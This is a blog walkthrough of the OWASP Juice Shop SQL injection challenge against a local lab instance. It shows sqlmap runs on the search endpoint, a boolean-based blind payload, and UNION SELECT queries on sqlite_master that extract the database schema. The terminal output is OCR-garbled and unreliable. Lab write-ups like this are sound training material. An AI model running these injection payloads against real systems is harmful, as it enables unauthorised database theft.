Pwning OWASP’s Juice Shop Pt. 21: Database Schema

Challenge: 

Name: Database Schema

Description: Exfiltrate the entire DB schema definition via SQL injection.

Difficulty: 3 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

Burp, FoxyProxy, sqlmap

Resources used:

Solutions Guide

SQLite Documentation

sqlmap Documentation

SQL Injection Payload Wordlist

OWASP SQL Injection Documentation

OWASP SQL Injection Bypassing WAF

Methodology: 

SQL injection is still a topic I need to gain a better grasp on. While I’ve taken courses where I’ve planned, diagrammed, and built databases, studied relational algebra, and written SQL queries, I’m more than a little rusty at it. That fact, coupled with a desire to become more comfortable with the tools available to me in Kali Linux, led to using sqlmap for my first attempt at solving this problem. From previous challenges (DOM XSS) I knew that there was no input sanitization on the “Search” field, so I decided to start there.

As sqlmap has differing levels of intensity (how noisy and potentially harmful it is to the target system), and because I’m running the application on Docker, I decided there was no real point in being quiet. As such I set up the program to be exceedingly thorough in its search of that input field.

Colbyökali sqlmap -u http://localhost:3øøø/rest/products/search?q= - 
dbs 
-risk-3 
{1.4.9.12#dev} 
- I-IV... 
http://sqlmap.org
I don’t care if it breaks, I just want to be certain.
sqlmap identified the following injection point(s) with a total of 176 HTTP(s) r 
equests : 
Parameter: q (GET) 
Type: boolean-based blind 
Title: AND boolean-based blind - WHERE or HAVING clause 
payload: q;' ) AND 3971=3971 AND ('CSPd' LIKE 'CSPd 
[14:38:39] [ 
] testing SQLite 
INFO 
[14:38:39] [ 
] confirming SQLite 
INFO 
[14. 
] [INFO 
] actively fingerprinting SQL ite 
• 38:39 
[14. 
] [INFO] the back-end DBMS is SQLite 
• 38:39 
back-end DBMS: SQLite 
14:38:39] [WARNING] on SQLite it is not possible to enumerate databases (use on 
y '--tables') 
[14:38:39] [WARNING 
] HTTP error codes detected during run: 
5øø (Internal Server Error) - 
140 times 
[14:38:39] [ 
] fetched data logged to text files under '/home/colby/.local/s 
INFO 
are/sqlmap/output/localhost ' 
ending 14:38:39 /2020-11-02/
Injection vulnerability located!

What do you know? It’s vulnerable! OK, so now to extract the database schema and finish off this challenge.

Col byakal i : —$ 
sqlmap 
-u 
• 01 
- I-Iv...- 
http://localhost 
{1.4.9.12#dev} 
http://sqlmap.org 
. = --schema
[14 : 40 : 
] [INFO 
] resuming back-end DBMS 'sqlite' 
] [INFO] testing connection to the target URL 
resumed the following injection point(s) from stored session: 
sqlmap 
)arameter: q (GET) 
Type: boolean-based blind 
Title: AND boolean-based blind - WHERE or HAVING clause 
payload: q;' ) AND 3971=3971 AND ('CSPd' LIKE 'CSPd 
] [INFO] the back-end DBMS is SQLite 
'ack-end DBMS: SQLite 
'40:50 
'40:51 
retrieved: Addresses 
•40:52 
retrieved: Baskets 
'40:53 
•40:55 
'40:56 
retrieved: Challenges 
retrieved: Complaints 
'40:57 
•40:58 
• 40 
retrieved: Memories 
'41:oo 
•41:01 
'41:02 
retrieved: Quantities 
•41:04 
retrieved: Recycles 
•41:04 
•41:05 
'41:07 
retrieved: Wallets 
•41:07 
'41:08 
[14:40: 
] [INFO 
] enumerating database management system schema 
[14 • 40 : 
. 50] [IN 
O] fetching tables for database: 'SQL ite_masterdb' 
[14 •40: 
] fetching number of tables for database 'SQL ite_masterdb' 
[WARNING 
] running in a single-thread mode. Please consider usage of 
'tion 
[14. 
114. 
114. 
114. 
[14. 
114. 
114. 
114. 
[14. 
114. 
114. 
[14. 
[14. 
114. 
114. 
114. 
[14. 
114. 
[14. 
[14. 
[14. 
114. 
[14. 
' --threads ' 
[INFO] 
[INFO] 
[INFO] 
[INFO] 
[INFO] 
[INFO] 
[INFO] 
[INFO] 
[INFO] 
[INFO] 
[INFO] 
for faster data retrieval 
retrieved 
: 21 
retrieved : 
Users 
retrieved : 
sqlite_sequence 
retrieved : 
Products 
retrieved : 
Basketltems 
retrieved : 
Captchas 
retrieved: Cards 
retrieved : 
Deliveries 
retrieved : 
Feedbacks 
retrieved: ImageCaptchas 
retrieved : 
privacyRequests 
retrieved : 
purchaseQuantities 
retrieved: SecurityQuestions 
retrieved: SecurityAnswers 
fetched tables: 'SQLite_masterdb.SecurityQuestions' , ' 
SQLite_m

But there was no completion alert. It wasn’t difficult to figure out that OWASP hadn’t set up this challenge simply to test my sqlmap skills, so I began reading up on how to craft a UNION SELECT attack through the address bar. Thanks to the sqlmap results, I knew there were 21 different tables to enumerate, but beyond that I was a little lost.

localhost:3000/rest/products/search?q 
localhost:3000 
localhost:3000 
localhost:3000 
localhost:3000 
localhost:3000 
localhost:3000 
localhost:3000 
localhost:3000 
localhost:3000 
http://localhost:3000/rest/products/search?q=1 UNION SELECT sql FROM sqlite_master 
http://10calhose3000/rest/products/search?q=12 U NION SELECT 1/2, 3,4, S, , 8, 9.10, 11,12, 13, 17 22 FROM 
http://loca1hose3000/rest/products/search?q=12 U NION SELECT 1.2, S, 11.12, 13, FROM sq' 
http://10ca1hose3000/rest/products/search?q=12 UNION SELECT FROM sq' 
http://localhost:3000/rest/products/search?q=12 UNION SELECT FROM sql 
http://localhost:3000/rest/products/search?q=12 UNION SELECT tbl_name FROM sqlite _ master; 
http://localhost:3000/rest/products/search?q=12 UNION SELECT 1 FROM sqlite_master 
http://localhost:3000/rest/products/search?q=12 UNION SELECT sql FROM sqlite_master 
http://localhost:3000/rest/products/search?q=1 UNION SELECT sql FROM sqlite_master WHERE type= "table"

OK, a lot lost. After deciphering error after error, I narrowed down the number of tables I actually needed to enumerate to nine rather than 21. Knowing I was close, however, didn’t make this easier. Ultimately I gave in and read the solution. Had I replaced ‘1’ with ‘sql’ in my final query, it would have worked. Horseshoes and hand grenades, I suppose.

Because I had already used sqlmap and knew worked, once I had completed this challenge I went back and dumped the entire database to a text file, formatted that file for easy reading, and stored it for later use. The more I know about the system in general, and database contents specifically, the more easily I’ll be able to solve future challenges.

Hashes galore!

Prevention and mitigation strategies:

OWASP Mitigation Cheat Sheet

Sanitize input fields!

Lessons Learned and Things Worth Mentioning: 

  1. When I started writing these walkthroughs I pointed out that I would be using this series to learn, not to demonstrate mastery. It’s not my favorite thing in the world to admit defeat, but sometimes the best way to learn something is to see it done properly and try to understand why it works the way it does. Beating your head against the wall is only so effective.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s